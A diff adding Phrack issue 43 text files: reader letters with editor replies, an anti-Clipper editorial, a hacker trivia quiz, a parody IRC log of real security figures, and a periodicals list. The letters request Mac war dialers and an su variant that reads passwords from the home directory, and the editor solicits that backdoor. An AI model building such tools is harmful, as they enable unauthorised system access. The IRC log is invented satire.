+    I need to get in touch with some Macintosh phreakers. Know any?
+    Anyway, are there any good war dialers or scanners out there for
+    Macintosh? I need something that picks up PBXs and VMBs as well as
+    Carriers.
+    Thanx in advance...
+
+[Editor:  I personally avoid the little toadstools like the plague,
+          and I was unable to get a hold of the only hacker I know who
+          uses one.  If anyone out there on the net could email us
+          with the scoop on Mac hacking/phreaking utilities it would
+          be most appreciated.]
+
+*****************************************************************************
+
+Hello!  I was just wondering if you knew of any FidoNet site that carries
+back issues of phrack.  The main reason behind this, as my link through the
+Internet is basically through a FidoNet-type network and I am unable to ftp
+files.  Any help would be appreciated!
+
+Thanks!
+  Jason K
+
+[Editor:  Phrack pops up everywhere.  I would be very surprised if
+          it wasn't on a ton of fido sites.  However, I have no idea
+          of what those sites may be.  If anyone knows of any,
+          let us know!]
+
+****************************************************************************
+
+      Can you give me the email address for the 2600 Magazine or
+      whomever the person in charge.
+
+      I've no idea how to contact them, so that's why I'm asking you.
+
+      I'm much obliged.
+
+
+      Thanks,
+      MJS
+
+[Editor:  2600 magazine can be reached at 2600@well.sf.ca.us
+          To subscribe send $21 to 2600 Subscriptions, P.O. Box 752,
+          Middle Island, NY, 11953-0752.
+          To submit articles write to 2600 Editorial Dept., P.O. Box 99,
+          Middle Island, NY, 11953-0099.
+
+          Note:  If you are submitting articles to 2600 and to us,
+          please have the courtesy of LETTING BOTH MAGAZINES KNOW
+          IN ADVANCE.  Ahem.]
+
+****************************************************************************
+
+Do you know if there has been a set date and place for the next HoHoCon?
+
+Best Regards,
+Mayon
+
+
+[Editor:  Actually, it's looking more and more like HoHoCon will
+          be December 17, 18, 19 in Austin, TX.  It may still
+          be in Houston, but methinks the Big H has had about enough
+          of dFx.  We'll let you know when we know for sure.]
+
+****************************************************************************
+
+   Reporter for major metro paper is interested in help finding out anything
+there is to find on four prominent people who have volunteered to have their
+privacy breached.
+   Financial fundamentals. Lives of crime. Aches and pains. How rich they are,
+where they vacation, who they socialize with. You name it, we're interested in
+seeing if it's out there.
+   All for a good cause.
+   If you're willing to advise this computer-ignorant reporter, or dig in and
+get the dope on these volunteers, please contact him at tye@nws.globe.com
+   Or call at 617-929-3342.
+   Help especially appreciated from anyone in the BOSTON area.
+   Soon.
+
+   Thanks.
+
+[Editor:  Interesting.  This showed up in my box in late June, so it should
+          still be going.  I would recommend watching yourselves in any
+          dealings with journalists.  Take it form one who has been
+          burned by the press.  (And who has a journalism degree himself.)]
+
+****************************************************************************
+
+Hey there...
+
+I don't know if this will get to Dispater or to the new editor.  Since the
+change in editorship, the proper way to contact Phrack has become sort of a
+mystery.  (The new address wasn't included in Phrack 31.)
+
+Anyway, I'm writing to bitch about the quality of #31.  I've got two main beefs:
+1. The article about fake-mail was GREAT until it turned into a "how-to"
+ primer on using the info given to cause damage.  That is exactly the
+ kind of thing that will end up getting you sued.  I have some legal
+ background, and I'm pretty sure that the author of that article and
+ possibly even Phrack itself and its editors are now open to a damn
+ good argument for tortuous negligence if anyone follows the instructions
+ and damages someone on Compuserve, etc.
+
+ The argument will go something like, "Phrack set into motion a chain of
+ events that led to my client being damaged."  You guys should have
+ just given the info, and left off the moronic ways to abuse it.
+
+2. The article on "Mall Security Frequencies" was copied directly from
+ Popular Communications, Nov. 1992 issue.  Hell, that was even their
+ cover story.  Can we say "copyright enfringement?"  If not, I'm sure
+ you'll be _hearing_ it a few more times.  If I was still practicing,
+ I'd call 'em up and ask their permission to sue on contingency.
+ Split the damages obtained on a motion for summary judgment 50/50 with
+ them.  It would only take a week and one filed complaint...
+
+ Point is, you have opened yourselves up to get sued and lose EASILY.
+ As much as I've enjoyed reading Phrack over the years, if this new
+ staff continues in this manner, I'll be stuck with back-issues.
+
+Cyber (305)
+-------------------------------------------------------------------------
+To find out more about the anon service, send mail to help@anon.penet.fi.
+Due to the double-blind system, any replies to this message will be anonymized,
+and an anonymous id will be allocated automatically. You have been warned.
+Please report any problems, inappropriate use etc. to admin@anon.penet.fi.
+*IMPORTANT server security update*, mail to update@anon.penet.fi for details.
+
+[Editor:  I think you meant 41, not 31.  But to answer your points:
+
+          1) As long as there is a first amendment, Phrack will
+             continue to print articles that some may or may not
+             agree with.  Printing the blueprints for an atomic bomb
+             does not make you an accomplice to those who build it
+             and detonate it.
+          2) Numbers are numbers.  Can we even spell "copyright
+             infringement?"  If you were still "practicing..."
+             We at Phrack wholeheartedly encourage you to again pick
+             it up, and keep practicing and practicing until you
+             get whatever it is you were practicing down pat.
+             Obviously it must have been guitar, and not law.
+
+          Such a litigious society we live in.  Suing Phrack would
+          accomplish nothing.  It would not even hinder its
+          publication.  Since Phrack has no money, nothing would
+          be gained.  Even if fined, Phrack could not be forced to
+          sell its computer equipment to pay fines, since this would
+          be removing the livelihood of the publisher, thus it would
+          continue its quarterly publication.  Where on Earth did
+          you get such ideas?  You obviously know nothing about
+          lawsuits.  Any lawyer would laugh at the thought of suing
+          Phrack since it would gain nothing financially, and provide
+          such a huge amount of bad publicity that even if a judgement
+          were reached in their behalf it would not be worth it.
+          Oh wait, you were a lawyer.  Now I know why the past tense.
+
+          But you are correct on one point: we cannot print
+          copyrighted material without permission.  You may have
+          noted that last issue (among other changes) Phrack
+          no longer includes full text of news items without
+          prior permission from the publisher.  That was the
+          ONLY thing that worried me about publishing Phrack, and
+          so I changed it.
+
+          We at Phrack welcome constructive criticism, but at least
+          have the nerve to email directly, rather than hide behind
+          an anonymous remailer.  That way, someone could have
+          responded to you in a more direct and expeditious manner.]
+
+****************************************************************************
+
+Dear Sir/Madam,
+
+I am a student at ukc in England and wish to subscribe to Phrack receiving
+it as email at the following address ks16@ukc.ac.uk thank you and keep up the
+good work.
+
+We use unix and I would be interested in getting a copy of su (switch user)
+which looks for the user file passwd.su in the users home directory.  I don't
+know much about unix, but I do know it would need to run from my home directory
+and access the kernel.
+
+Many thanks for any help you may be able to give.
+
+S
+
+
+[Editor:  Its "SIR"  hehe.  Sir Bloodaxe.  In any case, if anyone would
+          care to draft up this modification to su and send it in
+          I'll print it in the next issue's line noise.]
+
+****************************************************************************
+
+I had some beef with Rack's article in PHRACK 42. I've attached a
+writeup of comments; you're welcome to a) forward it to him, b)
+shitcan it, or c) publish it.
+
+thx,
+-Paul
+
+My background: I've been into the scene for about 12 years. My day job
+is writing unix s/w for a NASA contractor. My night job... well, never
+mind that. I have a strong amateur interest in crypto, and I'd like to
+share some of what people in the usenet/Internet community have been
+kind enough to teach me.
+
+Racketeer sez:
+>        If you think that the world of the Hackers is deeply shrouded with
+>extreme prejudice, I bet you can't wait to talk with crypto-analysts.  These
+>people are traditionally the biggest bunch of holes I've ever laid eyes on. In
+>their mind, people have been debating the concepts of encryption since the
+>dawn of time, and if you come up with a totally new method of data encryption,
+> -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying
+>"Oh, I just came up with this idea for an encryption which might be the best
+>one yet" when people have dedicated all their lives to designing and breaking
+>encryption techniques -- so what makes you think you're so fucking bright?
+
+One real reason for this reaction is that people _have_ been studying
+encryption for 100 years or so. As a result, many simple cryptosystems
+are continually being reinvented by people who haven't ever made even
+a simple study of cryptosystems.
+
+Imagine if someone came up to you and said "Wow! I just found a
+totally K00L way to send fake mail! It's radical! No one's ever
+thought of it before!"
+
+You'd laugh, right? _Anyone_ can figure out how to forge mail.
+
+Well, _anyone_ can come up with the n-th variation of the Vigniere or
+substitution cipher.
+
+An even more important reason for their 'tude is that cypherpunks are
+suspicious by nature.  A key principle of crypto is that you can only
+trust algorithms that have been made public and thoroughly picked
+over. Without that public scrutiny, how can you trust it?
+
+The fedz' Digital Signature Standard (DSS) got raked in the crypto and
+industry press because the fedz wouldn't disclose details of the
+algorithm. "How do we know it's secure?" the cypherpunks asked. "We
+won't use it if we don't know it's secure!"
+
+Point being: (for those of you who skipped over) cypherpunks trust NO
+ONE when the subject is encryption algorithms. Maybe J. Random Hacker
+has come up with a scheme faster and more secure than, say, RSA. If
+JRH won't share the details, no one will use it.
+
+Racketeer goes on to talk about DES. One important thing to note is
+that the unix crypt() function has NOTHING to do with DES. Here's part
+of the SunOS 4.1.2 man page for crypt():
+
+     crypt implements a  one-rotor  machine  designed  along  the
+     lines  of  the  German Enigma, but with a 256-element rotor.
+     Methods of attack on such machines are  widely  known,  thus
+     crypt provides minimal security.
+
+It's fairly clear that for a known-ciphertext attack (i.e. you
+have a block of encoded text, but neither the key nor the plaintext)
+will, at worst, require 2^56 decryption attempts. Various schemes for
+parallel machines and so forth have been posted in sci.crypt. Does the
+NSA have something that can crack DES? Probably.
+
+Remember that DES is mostly used for short-lived session keys. ATMs
+are a good example; they typically use a DES key for one communication
+session with the central bank. New session, new key. DES is _not_ very
+well suited for long-term encryption, since it can probably be
+attacked in "reasonable" time by a determined, well-equipped opponent.
+
+Now, on to PGP. Pretty Good Software was indeed threatened with a
+lawsuit by Public Key Partners (PKP). PKP holds the patent on the RSA
+public-key algorithm. (Many people, me included, don't think that the
+patent would stand up in court; so far, no one's tried.)
+
+The nice thing about PGP is that it offers IDEA and RSA in a nice
+package. When you encrypt a file, PGP generates an IDEA session key,
+which is then encrypted with RSA. An opponent would have to either a)
+exhaustively search the entire IDEA key space or b) break RSA to
+decrypt the file without the password.
+
+Racketeer also mentions that PGP can optionally compress files before
+encryption. There's a solid crypto reason behind this, too. One
+well-known and successful way to attack an encrypted file is to look
+for patterns of repeated characters. Since the statistical frequencies
+of word and letter use in English (and many other languages; some
+folks have even compiled these statistics for Pascal & C!) are
+well-known, comparing the file contents with a statistical profile can
+give some insight into the file's contents.
+
+By compressing files before encrypting them, PGP is moving the
+redundancy out of the text and into the small dictionary of
+compression symbols. You'd still have to decrypt the file before you
+could do anything useful with that dictionary, or even to determine
+that it _had_ a signature!
+
+
+[Editor:  Well, Rack is not to blame for all complaints I got about the
+          file.  I printed a file that was several KBytes short of
+          complete.  I noticed it seemed odd, but was assured by
+          Rack, TK & Presence that I had received the correct file.
+          I was misinformed, and should have known better than to
+          print a file I should have known was incomplete.  I apologize
+          to Rack & to all of you.
+
+          About the other gripes:  Rack, care to reply?]
+
+*****************************************************************************
+
+In issue #42 of Phrack there was an article about the USPS' practice of
+selling change of address information without consumer consent.  I sent
+the supplied form letter and carbon copied my congressman and senators.
+Today I received a reply from the USPS Records Office.
+
+April 1, 1993
+
+Dear Mr. Rosen:
+
+This concerns your recent Privacy Act request for accountings of
+disclosure of mail forwarding information you have provided to the Postal
+Service.
+
+Disclosure of your forwarding address might have been made to individual
+requesters by post offices or to subscribers to the National Change of
+Address File (NCOA) by an NCOA licensee.  The NCOA is a consolidated file
+of all forwarding information provided by postal customers and stored on
+automated media.  Listholders may subscribe to NCOA to obtain the new
+addresses of individuals for whom they already have in their possession
+the old address.
+
+For disclosures made by post offices, we are in the process of querying
+the Washington, DC postmaster for any accountings.
+
+For disclosures made from the NCOA system, we will begin querying NCOA
+licensees all of which keep logs identifying the particular subscribers to
+whom they have given NCOA information.  This accounting will not identify
+with certainty the subscribers who have in fact received your new address,
+but will give you a list of all subscribers receiving NCOA service for the
+relevant time period and thus might have received your address.
+
+Because a large number of requests like yours are being received, there
+will be a delay in responding.  Requests are being processed in order of
+receipt and you will be sent the accountings as soon as possible.  Your
+patience is appreciated.
+
+Sincerely,
+
+Betty E. Sheriff
+USPS Records Officer
+
+
+[Editor:  Thanks for sending that letter in!  Amazing that someone
+          in the maze of red tape even thought to make a form letter
+          to respond.  I think I'll demand a disclosure as well.]
+****************************************************************************
+
+                             Phrack 42 Errata
+
+We mistakenly noted that the TRW video shown at HoHoCon was dubbed by
+Dispater and Scott Simpson.  It was actually made by Dispater and ZIBBY.
+
+****************************************************************************
+
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 3a of 27
+
+                                  EDITORIAL
+
+                           My Problems With Clipper
+
+                               by Chris Goggans
+
+The introduction of the new government backed encryption chip, Clipper,
+has become a much debated issue.  I like many others have a large number
+of problems with the chip and the problems it may bring in the future.
+
+Why should we believe that this algorithm is robust?  For years
+and years the NSA has backed DES as the encryption standard, when
+cryptoanalysts have consistently brought its strength into question.
+Additionally, the NSA has forced companies to submit their routines
+for analysis before allowing them to be distributed commercially.  At
+times they have even requested that the algorithms be purposely
+weakened (we will assume that this was so they could more easily
+decipher the encrypted data.)
+
+With this in mind, why should we now meet anything endorsed by the NSA
+with anything but suspicion?  And the fact that they refuse to release
+the algorithm for security reasons even further adds to the suspicion
+that this chip is either inherently weak and easily broken by the NSA
+or that there is a backdoor in the algorithm that will allow the NSA
+to effortlessly view any data encrypted with the Clipper.
+
+Assuming that the government is on the level (for once), and they cannot
+decipher Clipper-encrypted data without legally obtaining keys from
+the assigned escrow agents.  The idea that the government will have to
+go before a judge and show just cause for needing the keys pacifies some,
+but from my own personal experience, the government will always get
+what they want.  If the Secret Service could get a search warrant to
+enter my home based solely upon one posting to an electronic bulletin board,
+they could certainly obtain the necessary keys needed to decipher my
+speech.  In fact, most non-technical persons will become needlessly
+suspicious upon the mere mention of someone using encrypted speech mechanisms
+and be more easily swayed to release the keys to law enforcement.
+
+Should Clipper be adopted by various government agencies for use, this could
+have serious trickle-down effects upon the lives of regular citizens.
+Let's say the military decides that they will use Clipper.  They will then
+most likely require their various contractors to use it as well.  Then
+after continued use, the contractor may begin to tell its other customers
+to communicate with them using Clipper also.  Usage could grow
+exponentially as more and more people become comfortable with the use
+of the secure communications devices until it becomes a defacto standard
+without any legal pressures to use it ever mandated by Congress.
+Should Congress mandate its use in any form, even if only within the
+government itself, this potentiality will rapidly become reality.
+
+If Clipper eventually receives such accepted use, anyone using any other
+type of encryption will be immediately suspect.  "Why aren't you using
+the chip?  What do you have to hide?"  The government may even outlaw
+the use of any other encryption technologies, and if America
+has become comfortable and satisfied with Clipper such a law may go
+unchallenged, after all, only spies, child pornographers and drug dealers
+would have something to hide, right?
+
+As the world's computer networks creep ever further into our daily lives,
+and the speed and power of supercomputers multiplies every year a rather
+frightening scenario emerges.  Since the government is a major funder of
+the Internet, who is to say that Clipper won't become the basis for
+encrypting over its lines?  As our country moves closer to ISDN and the
+PSTN and the PSDN's become more intertwined, who is to say that Clipper
+won't be the basis for encryption since companies like AT&T already
+endorse it?
+
+Imagine if you will, a massively parallel supercomputer, the likes of which
+may not exist yet, in a special room in Ft. Meade, or buried underground
+in New Jersey, that consistently decrypts all communications and
+sorts it according to communicating parties.  Then through the use of
+AI, the computer decides whether or not such communication presents a threat
+"to national security."
+
+The structure of the telephone network already supports such an arrangement.
+The purpose of the NSA allows for such an arrangement.  The advances in computer
+technology will give the potential for such an arrangement.  If Clipper is
+tainted, yet accepted, there will be no more privacy in America.
+
+Perhaps my view of the government and their ultimate intentions is way off
+base.  I sincerely hope so, as I do not want to be forced to take the mark
+of this beast to conduct my business dealings and to live my life in peace.
\ No newline at end of file
diff --git a/phrack43/4.txt b/phrack43/4.txt
new file mode 100644
index 0000000..79b9932
--- /dev/null
+++ b/phrack43/4.txt
@@ -0,0 +1,1217 @@
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Three, File 4 of 27
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+******************************************************************************
+
+                          PHRACK TRIVIA
+
+This is pretty damn hard.  In fact, some of it is downright obscure.
+And the bonuses?  Forget about it.  Answer the questions, expand the
+acronyms, explain the numbers.
+
+The five highest scorers by the next issue (or the first 5 to get
+perfect scores) win COOL STUFF!
+
+Send your answers to phrack@well.sf.ca.us
+
+
+1)      CCIS
+
+2)      Stimpson J. Cat's Roommate is?
+
+3)      Name the cracker.
+
+4)      METAL AE password.
+
+5)      Who invented the TeleTrial?
+
+6)      Name Bloom County's hacker.
+
+7)      What was the Whiz Kids' computer named?
+
+8)      Western Union owned what long distance service?
+
+9)      What computer read both Apple ][ and IBM PC disks?
+
+10)     Who made the "Charlie" board?
+
+11)     How many credits for a CNE?
+
+12)     What was in the trunk of the Chevy Malibu?
+
+13)     Name three bands A. Jourgensen had a hand in.
+
+14)     SYSTEST Password:
+
+15)     What computer makes the best SimStim decks?
+
+16)     What magazine brought the telephone underground to national
+        attention in 1971?
+
+17)     What is the significance of 1100 + 1700 hz?
+
+18)     What magazine was raided for publishing black box plans?
+
+19)     What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?
+
+20)     CLASS
+
+21)     What computer responds "OSL, Please" ?
+
+22)     RACF secures what OS?
+
+23)     The first person to create a glider gun got what?
+
+24)     QRM
+
+25)     PSS
+
+26)     What PSN was acquired by GTE Telenet?
+
+27)     914-725-4060
+
+28)     April 15, 1943
+
+29)     8LGM
+
+30)     WOPR
+
+31)     What happened on March 1, 1990?
+
+32)     Port 79
+
+33)     Who starred in the namesake of Neil Gorsuch's UNIX security
+        mailing list?
+
+34)     What Dutch scientist did research in RF monitoring?
+
+35)     What was the author of GURPS Cyberpunk better known as?
+
+36)     Who would "Piss on a spark plug if he thought it would do
+        any good?"
+
+37)     What thinktank did Nickie Halflinger escape from?
+
+38)     NCSC
+
+39)     Who is Pengo's favorite astronomer?
+
+40)     What language was Mitnik's favorite OS written in?
+
+41)     Abdul Alhazred wrote what?
+
+42)     The answer to it all is?
+
+43)     Who is the father of computer security?
+
+44)     Who wrote VCL?
+
+45)     What kind of computer did Cosmo have?
+
+46)     Hetfield, Ulrich, Hammet, Newstead
+
+47)     What company wrote the computer game "Hacker?"
+
+48)     Who does Tim Foley work for?
+
+49)     Who played Agent Cooper?
+
+50)     Vines runs over what OS?
+
+51)     Mr. Peabody built what?
+
+52)     Who makes SecurID?
+
+53)     What's in a Mexican Flag?
+
+54)     Who created Interzone?
+
+55)     JAMs (as led by John Dillinger)
+
+56)     Abbie Hoffman helped start what phreak magazine?
+
+57)     What was once "Reality Hackers?"
+
+58)     Gates and Allen "wrote" BASIC for what computer?
+
+59)     Tahoe is related to what OS?
+
+60)     CPE 1704 TKS is what?
+
+61)     Telemail's default was what?
+
+62)     "Do Androids Dream of Electric Sheep" became what?
+
+63)     What broadcasts between roughly 40 and 50 mhz?
+
+64)     Who created Tangram, Stratosphere, and Phaedra among others?
+
+65)     What was Flynn's most popular video game?
+
+66)     Who lived in Goose Island, Oregon?
+
+67)     516-935-2481
+
+68)     What is the security of ComSecMilNavPac?
+
+69)     What has the "spiral death trap?"
+
+70)     Who was the Midnight Skulker?
+
+71)     TMRC
+
+72)     Who wrote "Jawbreaker?"
+
+73)     213-080-1050
+
+74)     What is the Tetragrammaton represented as?
+
+75)     Who is Francis J. Haynes?
+
+76)     Who ran into one of the Akira test subjects?
+
+77)     What had "Munchies, Fireballs and Yllabian Space Guppies?"
+
+78)     PARC
+
+79)     Alex and his droogs hung out where?
+
+80)     Jane Chandler in DC's "Hacker Files" is based on who?
+
+81)     The Artificial Kid lives on what planet?
+
+82)     208057040540
+
+83)     What are the two most common processors for cellular phones?
+
+84)     Who came up with the term "ICE?"
+
+85)     What group is hoped might help the "Angels" contact RMS?
+
+86)     Who is Akbar's friend?
+
+87)     What company's games was David Lightman after?
+
+88)     26.0.0.0
+
+89)     Who was Mr. Slippery forced to locate?
+
+90)     Who is "The Whistler?"
+
+91)     What use would a 6.5536 crystal be?
+
+92)     .--.  ....  .-.   .-  -.-.  -.-
+
+93)     The Dark Avenger likes what group?
+
+94)     What book spawned the term "worm?"
+
+95)     Michael in "Prime Risk" wanted money for what?
+
+96)     Automan's programmer worked for who?
+
+97)     What signal filled in keystrokes on TOPS-20?
+
+98)     ITS
+
+99)     (a/c)+121
+
+100)    What drug kept the scanners sane?
+
+Bonus 1
+3 pts   Name three bodies of work by Andrew Blake.
+
+Bonus 2
+3 pts   Name three currently available titles with N. L. Kuzma.
+
+Bonus 3
+4 pts   Why would I hate Angel Broadhurst?
+
+*****************************************************************************
+
+              IF SECURITY TYPES WERE K-RAD
+
+----------------------------------------------------------------
+
+
+IRC log started Fri June 18 01:14
+*** Value of LOG set to ON
+<Pat> bye peter
+*** Signoff: hackman (slavin' to da' MAN at TRW)
+<Ed> Dudez, I HATE filling out thez incident Rep0rtz
+<bartman> MUAHAHA Tuff J0b edd1e!
+<Ed> Funni
+*** zen (zen@death.corp.sun.com) has joined channel #CERT
+<Ed> re dan, just missed yer pal peety
+<Pat> Hi Dan!
+<zen> pal?  right.  ask the wife...
+<venom> re
+<zen> d00dz, we have SO many bugz.  sux 2 be me.
+*** venom has left channel #CERT
+*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
+*** venom has left channel #CERT
+*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
+*** venom has left channel #CERT
+*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
+<venom> ARG!
+<bartman> WTF Weitse?
+<venom> s0rri
+<zen> Where is everyone?  Anyone seen spaf?
+<Pat> I have.  He was going to install something.  He should be bak.
+<zen> ah
+*** Action: Ed throws darts at a cracker
+<zen> heh
+<venom> muaha
+*** bartman is now known as Cracker
+*** Action: Cracker hacks Cert with an axe
+<venom> dats a good 1
+*** Action Ed kicks cracker in the nuts
+<Cracker> OUCH!
+*** Signoff: donn (Bad Link?)
+<Cracker> [high voice] fuk u CERT!
+<Ed> heh.
+*** Action: Pat is ROFL
+<Cracker> wonder who's on #hack?  Mebbe i should go log em.
+<Ed> Yeah.  Oh hey, I got certbot online.  Ill send it to go log.
+*** certbot (ed@cert.org) has joined channel #CERT
+*** certbot has left channel #CERT
+<Ed> this will be fun.
+<venom> Hey, letz deop them and take over the channel.
+<zen> thats L A M E
+<Cracker> Ooooh.  OPWARZ!  I'll go make their channel +i muahaha
+*** Cracker has left channel #CERT
+*** Casper (casper@fwi.uva.nl) has joined channel #CERT
+<Casper> re all
+<Venom> hey dik-head.
+<zen> re
+<Pat> hahahaha  hi d00d.
+<Casper> funni whitesey venombreath
+<Ed> lame.
+*** donn (parker@bandit.sri.com) has joined channel #CERT
+<donn> 'sup?
+<Ed> re, oh great bald one
+<donn> eat me
+<zen> bahhahaha
+<Pat> Now now boyz.
+*** spaf (spaf@cs.purdue.edu) has joined channel #CERT
+<Pat> Spaffie!
+<zen> 3l33t SPAF!
+<Ed> re spaf
+<spaf> Yo.
+<venom> spaf...your book sucks.
+<spaf> oh fuck off dutch boy.
+<Casper> HEY!$!@%
+*** spaf has been kicked off channel #CERT by Casper
+<venom> thx dude
+<Ed> oh gawd...feetball
+*** spaf (spaf@cs.purdue.edu) has joined channel #CERT
+<spaf> lame
+*** Mode change "+o -o spaf Casper" on channel #CERT by Pat
+<spaf> thanks sweetie.
+<Casper> op!
+*** Mode change "+o Casper" on channel #CERT by venom
+<Casper> thx d00d
+<Ed> Hey dan, you got those patches online?
+<zen> maybe.  What YOU got?
+<donn> WAREZZ
+<Pat> heh
+<Ed> I dunno.  Ill dcc you a filelist.
+<zen> kool
+*** zardoz (neil@cpd.com) has joined channel #CERT
+<zardoz> HEY ... anyone want to contribute to my new list?
+<Ed> not me
+<zen> mebbe.  Whats this one called?  Coredoz?
+<donn> what list?
+<spaf> BAH.  Fuck your list man.  More crackrs have them than we do!
+<zardoz> who pissed in your coffee gene?
+<donn> heh
+*** zardoz is now known as neil
+<spaf> bah... I'm sick of those dicks using my own holes against me!
+<venom> Your holes?  Yer a-hole?
+<Pat> What is your list about this time?
+<neil> same thing.  Its called REWT!
+*** neil is now known as REWT
+<REWT> SEND ME YER BUGZ!@#
+*** Action: spaf sends REWT a 50 gig coredump
+<Pat> :)
+<REWT> u r lame.
+*** REWT is now known as neil
+<Ed> I hate these reports.  I wish I got to travel more.
+<Pat> come see me!
+<Casper> oooohhhh....netsex!
+<spaf> tramp.  :P
+*** bill (whmurray@dockmaster.ncsa.mil) has joined channel #CERT
+<bill> word!
+<Pat> hi bill.
+<donn> Bill!  D00d!  I am gonna be in Ct. next week!
+<bill> RAD!  call me voice at werk.  we'll thrash!
+<donn> you know it!
+<zen> oh puh-lease...the geriatric partiers :)
+<donn> farmboy
+<Ed> *****   *****   *****  *****
+<Ed> *       *       *   *    *
+<Ed> *       ***     ****     *
+<Ed> *       *       *   *    *
+<Ed> *****   *****   *   *    *
+<Ed>
+<Ed> *****   *   *   *      *****   *****  **
+<Ed> *   *   *   *   *      *       *      **
+<Ed> ****    *   *   *      ***     *****  **
+<Ed> *   *   *   *   *      *           *
+<Ed> *   *   *****   *****  *****   *****  **
+<Pat> No DUMPING!
+<zen> cert freshens your breath
+<donn> ACK!
+<venom> hee!  certs  haha
+*** ray (kaplan@bpa.arizona.edu) has joined channel #CERT
+<ray> hey guys!
+<Ed> ugh.  Cracker lover alert.
+<donn> commie
+<bill> Hey ray, come to snoop for your little cracker friends?
+<ray> come on, give it a rest guys.
+<Pat> hi ray
+<venom> ?
+*** Action: spaf spits on ray
+<spaf> heh
+*** ray has been kicked off channel #CERT by spaf
+*** Mode change "+b *!*@bpa.arizona.edu" on channel #CERT by spaf
+<neil> hey I wanted to talk to him about my list...
+<spaf> tough shit.
+<donn> heh.
+*** bartman (ddrew@opus.tymnet.com) has joined channel #CERT
+<Pat> re
+<Ed> how goes the takeover?
+<venom> didja kick em?
+<bartman> #hack is +i!  muahahaha
+<zen> how exciting.  not
+<donn> they deserve it...they are all punks.
+<spaf> hmm..did you get emails?  I may want to call their admins.
+<bartman> nope  damn.
+<Ed> certbot was there.  He got it.
+<spaf> coolness
+*** Signoff: bill (Bad link?)
+<Casper> ne1 going to hactics thing?
+<venom> me
+<Casper> besides you.  duh.
+<Ed> dunno.
+<bartman> not me.  I have no desire to pay for anything done by hackers
+<Ed> That reminds me.  Did anyone subscribe to Phrack?
+<Pat> nope.
+<bartman> oops.  HAHAHAHAHAHA
+<Ed> heh.
+<donn> Whats phrak?
+<neil> nope. my list is better.  Who wants on it?
+<Pat> me!
+<donn> what list?
+<Pat> OOH!  I have mail!  bye!
+<bartman> itz an ansi bomb!
+<Ed> bye Pat
+<Spaf> l8r
+<neil> heh.
+*** Signoff: Pat (Hugs to all)
+<Casper> well, i better do something productive 2. cya
+<venom> slatez d00d.
+*** Signoff: Casper (Hi ho hi ho its off to work I go)
+<donn> man its late.  I better go.  I gotta speech in the morn
+<Ed> you are getting old.
+<donn> am not
+<Ed> are so
+<donn> am not
+<Ed> are too!  infinity
+<donn> hasta
+*** Signoff: donn (|/dev/null)
+<Ed> laterz
+<Spaf> geez.  what a bunch of lamers.
+(ray/#CERT) UNBAN ME!
+<Spaf> hahaha
+<Ed> never gives up does he?
+<neil> seriously ed, Ive helped you guys out, send me stuff for REWT.
+<Ed> ill think about it
+<spaf> not
+<neil> it will be most savory.  I promise.  And secure!
+<spaf> pfft...and monkeys might fly out of my butt
+<Ed> Ill think about it.
+<zen> heh, I should do one called Supernova.  Exploding suns. hehe
+<Ed> heh
+<spaf> dats tha tr00f!
+<bartman> i like my sun
+<Ed> i know a bunch of crackerz who like bt's suns too.
+<spaf> hahahahahahahahahaha
+<venom> oh shit.  Im late.
+*** Signoff: venom (LATE!)
+<Ed> late 4 what?
+<spaf> his vasectomy.  har har
+<neil> heh
+*** REVENGE (kaplan@ai.bpb.arizona.edu) has joined channel #CERT
+*** Mode change "+o REVENGE" on channel #CERT by eff.org
+<Ed> whoops
+*** Mode change "+i" on channel #CERT by REVENGE
+<spaf> fuCK!  KICK HIM!
+*** spaf has been kicked off channel #CERT by REVENGE
+*** neil has been kicked off channel #CERT by REVENGE
+*** bartman has been kicked off channel #CERT by REVENGE
+*** Ed has been kicked off channel #CERT by REVENGE
+*** zen has been kicked off channel #CERT by REVENGE
+*** REVENGE is now known as ray
+<ray> hehe
+
+---------------------------------------------------------------------
+
+****************************************************************************
+
+Phrack Library of Periodicals
+
+2600
+Subscription Department
+P.O. Box 752
+Middle Island, NY 11953-0752
+$21.00/Year
+
+Animation Magazine
+5889 Kanan Road, Suite 317
+Agoura Hills, CA 91301
+$21.00/Year
+
+Bank Technology News
+Faulkner & Gray, Inc.
+Eleven Penn Plaza
+New York, NY 10117-0373
+$50.00/Year
+
+Ben Is Dead
+P.O. Box 3166
+Hollywood, CA 90028
+$20.00/Year
+
+Boardwatch Magazine
+7586 West Jewell Ave., Suite 200
+Lakewood, CO 80232
+$36.00/Year
+
+Boing Boing
+11288 Ventura Blvd. #818
+Studio City, CA 91604
+$14.00/Year
+
+Communications of the ACM
+1515 Broadway
+New York, NY 10036
+$30/Year
+
+CQ - The Radio Amateur's Journal
+76 North Broadway
+Hicksville, NY 11801-9962
+$22.95/Year
+
+Details
+P.O. Box 50246
+Boulder, CO 80321
+12.00/Year
+
+Dirt
+230 Park Ave
+New York, NY 10169
+(Supplement to Sassy & Marvel Comics)
+
+Electronics Now
+Subscription Service
+P.O. Box 51866
+Boulder, CO 80321-1866
+$17.97/Year
+
+Farout
+9171 Wilshire Blvd. Suite 300
+Beverly Hills, CA 90210
+$3.95/Issue
+
+Fate
+170 Future Way
+P.O. Box 1940
+Marion, OH 43305-1940
+$18.00/Year
+
+Femme Fatales
+P.O. Box 270
+Oak Park, IL 60303
+$18.00/Year
+
+Film Threat
+Subscriptions Department
+P.O. Box 16928
+N. Hollywood, CA 91615-9960
+$11.85/Year
+
+Film Threat Video Guide
+P.O. Box 3170
+Los Angeles, CA 90078-3170
+$12/Year
+
+Fringe Ware Review
+P.O. Box 49921
+Austin, TX 78765
+$12.00/Year
+
+Future Sex
+1095 Market Street, Suite 809
+San Francisco, CA 94103
+$18.00/Year
+
+Gray Areas
+P.O. Box 808
+Broomall, PA 19008-0808
+$18.00/Year
+
+High Times
+P.O. Box 410
+Mt. Morris, IL 61054
+$29.95/Year
+
+IEEE Spectrum
+445 Hoes Lane
+P.O. Box 1331
